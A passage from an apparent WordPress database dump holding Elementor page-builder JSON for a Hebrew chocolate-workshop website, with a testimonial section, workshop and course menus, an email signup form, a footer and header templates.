-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6478920\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#2d2d2d\"},\"elements\":[{\"id\":\"1db1127\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c5bd98f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05dc \\u05d4\\u05d6\\u05db\\u05d5\\u05d9\\u05d5\\u05ea \\u05e9\\u05de\\u05d5\\u05e8\\u05d5\\u05ea 2018 (c) - \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U<\\/p>\",\"text_color\":\"#ffffff\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1095,225,'_elementor_version','0.4'),(1103,227,'_elementor_template_type','header'),(1104,227,'_elementor_edit_mode','builder'),(1105,227,'_edit_lock','1576877373:1'),(1106,227,'_wp_page_template','default'),(1107,227,'_elementor_data','[{\"id\":\"fc92f67\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124},\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"7563d7a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"2c06d26c\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75ff2908\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\",\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"629a0eb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"795b34de\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\",\"menu\":\"%d7%a8%d7%90%d7%a9%d7%99\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false}]'),(1108,227,'_elementor_version','0.4'),(1109,227,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(1110,228,'_elementor_template_type','header'),(1111,228,'_elementor_edit_mode','builder'),(1112,228,'_wp_page_template','default'),(1113,228,'_elementor_data','[{\"id\":\"fc92f67\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124},\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"7563d7a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"2c06d26c\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false}]'),(1114,228,'_elementor_version','0.4'),(1115,228,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(1117,229,'_elementor_template_type','header'),(1118,229,'_elementor_edit_mode','builder'),(1119,229,'_wp_page_template','default'),(1120,229,'_elementor_data','[{\"id\":\"fc92f67\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124},\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"7563d7a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"2c06d26c\",\"el